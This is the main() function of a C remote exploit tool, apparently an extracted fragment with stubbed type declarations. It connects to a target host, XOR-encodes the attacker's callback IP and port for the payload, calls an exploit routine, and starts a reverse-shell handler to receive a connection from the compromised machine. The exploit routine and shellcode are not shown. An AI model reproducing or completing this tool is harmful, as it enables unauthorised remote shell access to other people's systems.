
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


struct sockaddr_in {int dummy; } ;
struct hostent {int dummy; } ;
struct TYPE_3__ {int lport; int target; int lip; int tport; int tip; } ;
typedef TYPE_1__ args ;


 int connect_to_remote_host (int ,int ) ;
 int exit (int) ;
 int exploit (int,unsigned long,unsigned short,int ) ;
 int header () ;
 unsigned short htons (int ) ;
 unsigned long inet_addr (int ) ;
 int parse_arguments (int,char**,TYPE_1__*) ;
 int printf (char*) ;
 int start_reverse_handler (int ) ;
 int system (char*) ;

int
main ( int argc, char* argv[] )
{
 int s, targ, i;
 unsigned long xoredip;
 unsigned short cbport, xoredcbport;
 struct sockaddr_in remote_addr;
 struct hostent *host_addr;
 args myargs;

 system ( "clear" );
 header ();
 parse_arguments ( argc, argv, &myargs );
 s = connect_to_remote_host ( myargs.tip, myargs.tport );

 xoredip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
 xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;

 if ( exploit ( s, xoredip, xoredcbport, myargs.target ) == 1 )
 {
  printf ( "exploitation FAILED!\n" );
  exit ( 1 );
 }
 start_reverse_handler ( myargs.lport );
}
